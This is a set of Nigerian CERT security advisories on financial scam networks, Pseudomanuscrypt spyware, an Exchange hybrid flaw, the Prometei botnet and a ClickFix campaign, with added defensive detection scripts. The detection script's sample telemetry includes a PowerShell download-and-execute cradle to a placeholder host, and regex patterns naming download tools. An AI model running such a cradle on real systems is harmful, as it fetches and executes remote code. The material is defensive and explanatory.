Advisory ID: ngCERT-2025-110010
SUMMARY
ngCERT alerts on escalating financial cyber-enabled scams by organised criminal networks targeting global financial systems. These scams are perpetrated by leveraging advanced technology and social engineering tactics, aimed at gaining illegal financial proceeds. In 2024 alone, global scam operations resulted in over $16.6 billion in losses to US victims, a 33% increase from the previous year, with Transnational Crime Organisations (TCOs) in Southeast Asia playing a central role. These networks employ forced labour in scam centres, AI-driven impersonation, and cryptocurrency laundering to target individuals and institutions. Recent international operations have led to thousands of arrests and asset seizures, but the threat persists, driven by high profits estimated at $3 trillion annually and evolving tactics. The severity, frequency and complexity of these scams underscore the need for individuals and financial institutions to implement proactive measures to safeguard their lives and systems.
Damage: Critical
Probability: High
Platform(s): Financial Systems
DESCRIPTION
These criminal networks operate like multinational corporations, establishing scam centres in regions with weak governance, such as Southeast Asia, where they coerce trafficked individuals into perpetrating fraud through debt bondage and violence. Key tactics include:
- Romance Baiting and Pig-Butchering Scams: Fraudsters build trust through dating apps or social media, posing as romantic interests or friends, then lure victims into fake cryptocurrency or investment platforms. Once invested, scammers drain funds, often using "USDT Token Approval Scams" where victims unknowingly grant wallet access through phishing links.
- Phishing and Impersonation: Mass phishing campaigns mimic banks or executives in Business Email Compromise (BEC) schemes, tricking users into transferring funds or credentials. Additionally, AI is utilised to enhance deep fakes for voice/video calls.
- Money Laundering through Mule Networks: Nearly 2 million money mule accounts were reported in 2024, where recruited individuals (often scam victims themselves) launder illicit proceeds through legitimate financial channels, including virtual asset service providers (VASPs).
- Investment and E-Commerce Fraud: Fake online shopping sites or high-yield investment promises exploit economic vulnerabilities, with proceeds funnelled through stablecoins like Tether (USDT).
CONSEQUENCES
The ramifications of these scams are highlighted as follows:
- Economic Losses.
- Human Exploitation.
- Systemic Risks.
- Psychological and Societal Harm.
SOLUTION/MITIGATION
ngCERT recommends that financial institutions should:
- Launch public campaigns to educate users on spotting romance scams, fake investments, and phishing while promoting 2FA and transaction cool-off periods.
- Deploy AI-powered behavioural biometrics and fraud detection systems to identify and block money mule accounts.
- Use advanced technology like deep fake detection tools and real-time wallet monitoring, combined with cross-sector intelligence sharing, to disrupt scams early.
- Tighten KYC/AML rules for high-risk transactions and conduct coordinated international operations against scam call centres.
- Encourage immediate reporting of all cyber-scam incidents to ngCERT and relevant agencies for rapid response.
- Establish easy-to-access victim hotlines, fund recovery pathways, and train bank staff to engage coerced money mules instead of prosecuting them.
HYPERLINK
- https://www.biocatch.com/press-release/nearly-two-million-money-laundering-accounts-reported-in-2024
- https://www.interpol.int/en/News-and-Events/News/2024/USD-257-million-seized-in-global-police-crackdown-against-online-scams
- https://www.moodys.com/web/en/us/kyc/resources/insights/how-organized-crime-networks-operate-financial-scams.html
- https://www.interpol.int/en/News-and-Events/News/2024/INTERPOL-Financial-Fraud-assessment-A-global-threat-boosted-by-technology
Advisory ID: ngCERT-2025-110003
SUMMARY
ngCERT is issuing an alert on the infiltration of Pseudomanuscrypt malware, a sophisticated spyware campaign primarily impacting Windows OS. Notably, this mass-scale operation has infected over 35,000 systems globally, focusing mainly on industrial control systems (ICS) and government entities. Particularly, Pseudomanuscrypt infiltration can lead to theft of sensitive credentials and data, potentially enabling follow-on ransomware attacks, financial fraud, and possible sabotage of critical infrastructure across various sectors. This underscores the need for individuals and organisations to take proactive steps to safeguard against Pseudomanuscrypt infiltration.
Damage: Critical
Probability: High
Platform(s): Microsoft Windows (OS)
DESCRIPTION
Attackers spread Pseudomanuscrypt mainly through fake pirated software installers and cracks downloaded from malicious sites, often sourced from Malware-as-a-Service platforms or delivered through botnets like Glupteba. Once downloaded, a 7z self-extracting archive drops loaders (install.dll and install.dat) into the %TEMP% folder, decodes shellcode, and launches the main payload while creating persistence through registry keys and scheduled tasks. The malware subsequently establishes resilient command-and-control communication using the KCP protocol or DNS tunnelling, backed by a Domain Generation Algorithm to evade blocking. After gaining a foothold, it performs extensive reconnaissance, including logging keystrokes, capturing screenshots and video, stealing credentials and clipboard data, monitoring VPNs, and mapping the network. It also pulls additional modules for deeper espionage or secondary infections, such as cryptocurrency miners.
CONSEQUENCES
A successful Pseudomanuscrypt malware infection can lead to:
- Theft of sensitive credentials, intellectual property, and operational data.
- Financial losses through fraud.
- Ransomware attacks.
- Sabotage and disruption of critical services and infrastructure.
- Reputational damage.
SOLUTION/MITIGATION
ngCERT recommends the following prioritised actions:
- Patch and update all systems, especially Windows and ICS software, disable unnecessary services and enforce least-privilege access.
- Deploy reputable antivirus solutions with behavioural detection configured for real-time scanning. Enable application whitelisting to block unauthorised executables.
- Avoid downloading cracked or pirated software; verify sources and use official channels. Educate users on phishing and malicious archives through regular awareness training.
- Implement EDR tools to detect anomalous behaviours like unusual C2 traffic. Segment ICS networks and monitor for persistence artifacts in %TEMP% and registry hives.
- If infected, isolate affected systems, scan with reputable tools, and reset credentials. Report incidents to ngCERT for coordinated response.
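As an added triage helper (not ngCERT's or any vendor's tooling), the following Python checks for the persistence artifacts the advisory names: the install.dll/install.dat loaders in %TEMP%, and Run-key values or scheduled-task actions that execute from %TEMP%. The advisory gives no registry value or task names, so any autostart entry pointing into TEMP is flagged for analyst review; the HKCU Run-key collector is an assumption about where to look and only runs on Windows.

```python
import os
import sys
from pathlib import Path

LOADER_NAMES = {"install.dll", "install.dat"}   # loader file names from the advisory
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"   # assumed location to audit

def _in_temp(command, temp_dir):
    """True if the command string references the TEMP directory (case-insensitive)."""
    return os.path.normcase(temp_dir.rstrip("\\/")) in os.path.normcase(command)

def triage(temp_dir, run_values, task_actions):
    """run_values: {value_name: command}; task_actions: {task_name: command}.
    Returns a list of (category, detail) findings for an analyst to review."""
    findings = []
    p = Path(temp_dir)
    if p.is_dir():
        for f in p.iterdir():
            if f.is_file() and f.name.lower() in LOADER_NAMES:
                findings.append(("temp_loader", str(f)))
    for name, cmd in run_values.items():
        if _in_temp(cmd, temp_dir):
            findings.append(("run_key", f"{name} -> {cmd}"))
    for name, cmd in task_actions.items():
        if _in_temp(cmd, temp_dir):
            findings.append(("scheduled_task", f"{name} -> {cmd}"))
    return findings

def collect_run_values():
    """Read HKCU Run values on Windows; returns {} elsewhere. Scheduled-task
    actions are left to the caller (e.g. parsed from `schtasks /query /fo csv /v`)."""
    if sys.platform != "win32":
        return {}
    import winreg
    out = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        for i in range(winreg.QueryInfoKey(key)[1]):
            name, data, _ = winreg.EnumValue(key, i)
            out[name] = str(data)
    return out

if __name__ == "__main__":
    temp = os.environ.get("TEMP", "/tmp")
    for cat, detail in triage(temp, collect_run_values(), {}):
        print(f"[{cat}] {detail}")
```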
HYPERLINK
- https://breachspot.com/news/cyber-attacks/pseudomanuscrypt-malware-spreads-like-cryptbot-targeting-korean-users/
- https://thehackernews.com/2022/02/pseudomanuscrypt-malware-spreading-same.html
- https://thrive.trellix.com/s/article/KB95251?language=en_US
- https://thehackernews.com/2025/08/microsoft-discloses-exchange-server.html
Advisory ID: ngCERT-2025-110004
SUMMARY
ngCERT is aware of a high-severity vulnerability which combines elements of CWE-287 (Improper Authentication) with a privilege escalation path identified in Microsoft Exchange Server hybrid deployments. This deployment connects on-premises Exchange servers to Exchange Online within Microsoft 365. The flaw, tracked as CVE-2025-53786, arises from weak authentication trust established between the two environments through a shared service principal. Attackers could exploit this weakness if they already hold administrative privileges on-premises and abuse this trust relationship to escalate privileges into the connected cloud environment. Consequently, individuals and organisations are advised to take immediate steps to protect their systems from exploitation by threat actors.
Damage: Critical
Probability: High
Platform(s): Microsoft Exchange Server (Hybrid Deployments)
DESCRIPTION
CVE-2025-53786 stems from improper authentication handling in hybrid Microsoft Exchange Server environments that link on-premises servers with Exchange Online. The flaw affects hybrid Microsoft Exchange setups and combines elements of CWE-287 (Improper Authentication) with a privilege escalation path. Threat actors with elevated privileges on the on-premises Exchange environment can exploit these weaknesses to request or forge tokens, thereby elevating their effective privileges in the cloud and gaining access to cloud services. This movement may occur without typical logging or controls catching the activity, complicating detection and response. Affected systems include Exchange Server 2016, 2019, and Subscription Edition that have not applied Microsoft’s April 2025 hybrid configuration update. Organisations are advised to apply the April 2025 or later Exchange Server hotfix to avoid being vulnerable to cross-environment privilege escalation.
CONSEQUENCES
Successful exploitation of this vulnerability could result in:
- Privilege escalation
- System compromise
- Persistence across environments
- Unauthorised cloud account access/takeover
- Data Exfiltration
- Lateral movement across a connected cloud environment
- Data tampering
- Reputational Damage
SOLUTION/MITIGATION
ngCERT recommends the following:
- Install the April 2025 or later Exchange Server hotfix on all on-premises servers in hybrid environments.
- Reconfigure the hybrid deployment to use a dedicated hybrid application in Entra ID instead of the legacy shared service principal model.
- Implement Microsoft’s Service Principal Clean-Up Mode to revoke and regenerate hybrid service principal credentials.
- Audit on-premises Exchange settings for hybrid status, update levels, shared principal use, admin access, and abnormal authentication activity.
- Restrict administrative privileges with the least privilege, enforce MFA, and monitor for suspicious admin activity.
- Implement logging and alerting for suspicious token requests, credential changes, and cross-environment access anomalies.
- If immediate patching isn’t possible, apply compensating controls like isolating the Exchange server, limiting outbound traffic, and monitoring hybrid token flows.
HYPERLINK
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53786
- https://www.cisa.gov/news-events/alerts/2025/08/06/microsoft-releases-guidance-high-severity-vulnerability-cve-2025-53786-hybrid-exchange-deployments
- https://techcommunity.microsoft.com/blog/vulnerability-management/mdvm-guidance-for-cve-2025-53786-exchange-hybrid-privilege-escalation/4442337
- https://thehackernews.com/2025/08/microsoft-discloses-exchange-server.html
Advisory ID: ngCERT-2025-110002
SUMMARY
ngCERT is aware of widespread malicious activities linked to the Prometei botnet affecting multiple network infrastructures within Nigeria’s cyberspace. Prometei is a modular malware that targets Windows and Linux servers for credential theft, cryptocurrency mining, and proxy exploitation. Reports indicate that the malware exploits unpatched systems, weak authentication, and exposed services such as Server Message Block (SMB) and Remote Desktop Protocol (RDP). Notably, infections have been observed across finance, education, telecommunications and energy sectors, with implications for prolonged network compromise, large-scale credential harvesting, and use of infected systems as proxies for further attacks. Consequently, organisations are urged to strengthen patching routines, improve authentication security, and monitor for unusual system resource usage.
Damage: Critical
Probability: High
Platform(s): Windows and Linux Servers
DESCRIPTION
Prometei is a sophisticated, self-updating botnet with modular plugins that enable the targeting of both Windows and Linux environments. Initial access is achieved by exploiting exposed services, primarily Microsoft Exchange Server vulnerabilities (ProxyLogon/ProxyShell chains) and weak or default RDP/SSH credentials, among others. Brute-force attacks against SMB, RDP, and MSSQL are also common vectors. After successful exploitation, Prometei drops executables such as svchost.exe or systemd-journald, named to pass as legitimate system files, escalates privileges using exploits such as PrintNightmare or EternalBlue variants, and disables security tools. For command and control, the malware uses domain generation algorithms (DGA) and HTTP/HTTPS over non-standard ports that mimic legitimate traffic, and newer variants route communication through Tor. It aggressively steals credentials, spreads laterally across networks and turns infected systems into high-performance Monero miners. It also installs SOCKS5/HTTP proxies for resale on underground markets, and exfiltrates browser passwords and VPN configurations.
CONSEQUENCES
A successful Prometei infection could result in:
- Severe performance degradation.
- Data breach.
- System compromise.
- Financial losses.
- Exposure of national networks to global cybercrime operations.
SOLUTION/MITIGATION
ngCERT recommends the following:
- Apply critical patches; disable legacy services like SMBv1.
- Enforce MFA and strong password policies.
- Segment networks and limit administrative access.
- Deploy EDR/XDR to detect abnormal processes and C2 traffic.
- Monitor for CPU spikes, mining processes, and failed login attempts.
- Conduct regular audits and access reviews.
- Isolate infected hosts and reset exposed credentials.
- Train staff on identifying early indicators of compromise.
Advisory ID: NCC-CSIRT-2025-026
Summary:
Security researchers (eSentire, The Hacker News coverage) have identified a November 2025 campaign, tracked as EVALUSION, that uses the ClickFix social-engineering technique to trick users into executing commands which lead to the installation of the Amatera Stealer (packed with PureCrypter) and the follow-on deployment of NetSupport RAT. The attack chain injects a packed Amatera DLL into MSBuild.exe, harvests browser and wallet data, then executes PowerShell to fetch and run NetSupport for persistent remote access.
Damage/Probability: High/High
Indicators of Compromise (IOCs):
IOCs change rapidly. Pull up-to-date lists from vendor CTI and your telemetry before actioning.
- Run/explorer.exe spawning msbuild.exe with injected DLLs.
- Unknown DLLs loaded into msbuild.exe or other trusted developer processes.
- PureCrypter artifacts and PowerShell one-liners contacting suspicious domains.
- NetSupport RAT beacons or console connections to unknown endpoints.
- Outbound connections to vendor-flagged malicious download/C2 domains.
Product(s):
- Microsoft Windows endpoints (workstations and servers)
- Browsers and browser-stored credentials (Chrome, Edge, Firefox) and password managers
- NetSupport RAT (remote access tooling abused as payload)
- Amatera Stealer (infostealer family) and PureCrypter (loader/crypter)
Version(s):
Not version-specific; the campaign affects Windows systems where users execute the staged payloads. Detection and remediation depend on endpoint protections and configuration.
Platform(s):
- Enterprise and unmanaged Windows hosts
- Remote workers’ machines
- Environments where MSBuild.exe and PowerShell are allowed to run.
Description:
The campaign begins with phishing, malvertising, or compromised pages that present a ClickFix-style visual or instruction prompting the user to run a command (the “ClickFix” interaction), often via the Windows Run box or a similarly trivial user action. ClickFix is an interactive social-engineering technique designed to coax users into executing commands that would normally be blocked or inspected. Once the user follows the prompt, the chain drops a PureCrypter-packed Amatera DLL, which the actor injects into MSBuild.exe to evade detection. The stealer harvests browser credentials, cookies, crypto wallets and system artifacts, then executes a PowerShell stage that downloads and installs NetSupport RAT to provide remote control to the attacker.
Threat Types:
- Infostealer (Amatera): credential, cookie and crypto-wallet harvesting.
- Remote Access Trojan (NetSupport): full remote control and lateral movement.
- Social-engineering vector: ClickFix (interactive user trick that bypasses some security controls).
- Crypter/loader use (PureCrypter) to evade detection. (Proofpoint)
Impacts:
- Theft of browser passwords, cookies, form data, and crypto wallets.
- NetSupport RAT enables remote access and data exfiltration.
- Crypter packing and DLL injection evade signature-based detection.
- Unmanaged endpoints with corporate resources increase operational risk.
Solutions:
NCC-CSIRT recommends the following mitigation steps:
- Hunt for msbuild.exe loading unknown DLLs or appearing in unusual process chains.
- Monitor PowerShell for download-execute or encoded scripts.
- Check browsers for unexpected children or credential access.
- Block & alert on domains/IPs linked to PureCrypter, Amatera, NetSupport.
- Sandbox suspicious attachments/pages with interactive Run patterns.
- Quarantine endpoints and block known malicious domains from CTI feeds.
- Enforce execution controls: restrict msbuild.exe, constrain PowerShell, block unsigned scripts.
- Rotate credentials, force reauthentication, and reset MFA if compromised.
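As an added example of the hunt guidance above (not code from NCC-CSIRT, eSentire or any vendor), the following Python runs the EVALUSION process-chain logic over constructed process-creation events: msbuild.exe launched by an interactive parent, and PowerShell spawned by msbuild.exe or carrying a download-execute cradle or encoded command. The sample events, PIDs and the placeholder URL are constructed, not real telemetry.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """One process-creation event (Sysmon EID 1 / Windows 4688 style)."""
    pid: int
    ppid: int
    image: str      # executable file name, lower-case
    cmdline: str

# Constructed sample telemetry: a ClickFix-style chain (explorer -> msbuild ->
# powershell download cradle) next to two benign look-alikes. Not real data;
# the URL is a placeholder.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "msbuild.exe", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"),
    ProcEvent(300, 200, "powershell.exe",
              "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://placeholder.invalid/ns')\""),
    ProcEvent(400, 100, "devenv.exe", "devenv.exe"),
    ProcEvent(500, 400, "msbuild.exe", "msbuild.exe build.proj"),        # benign: IDE build
    ProcEvent(600, 100, "powershell.exe", "powershell -File backup.ps1"),  # benign script
]

# Command-line patterns from the advisory's hunt guidance: download-execute
# cradles and encoded scripts.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|start-bitstransfer", re.I)
ENCODED = re.compile(r"-(e|ec|enc|encodedcommand)\b", re.I)
# Parents that indicate a user-driven (Run box / script host) launch rather than a build tool.
INTERACTIVE_PARENTS = {"explorer.exe", "wscript.exe", "mshta.exe"}

def find_suspicious(events):
    """Return [(pid, reason)] for events matching the EVALUSION chain."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        parent = by_pid.get(e.ppid)
        pimage = parent.image if parent else ""
        if e.image == "msbuild.exe" and pimage in INTERACTIVE_PARENTS:
            alerts.append((e.pid, f"msbuild.exe launched by {pimage} (ClickFix/Run-box pattern)"))
        elif e.image == "powershell.exe":
            reasons = []
            if pimage == "msbuild.exe":
                reasons.append("spawned by msbuild.exe")
            if DOWNLOAD_CRADLE.search(e.cmdline):
                reasons.append("download-execute cradle")
            if ENCODED.search(e.cmdline):
                reasons.append("encoded command")
            if reasons:
                alerts.append((e.pid, "; ".join(reasons)))
    return alerts

if __name__ == "__main__":
    for pid, reason in find_suspicious(SAMPLE_EVENTS):
        print(f"ALERT pid={pid}: {reason}")
```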
References:
- https://thehackernews.com/2025/11/new-evalusion-clickfix-campaign.html
- https://www.esentire.com/blog/unpacking-netsupport-rat-loaders-delivered-via-clickfix
- https://www.proofpoint.com/au/blog/threat-insight/amatera-stealer-rebranded-acr-stealer-improved-evasion-sophistication
- https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/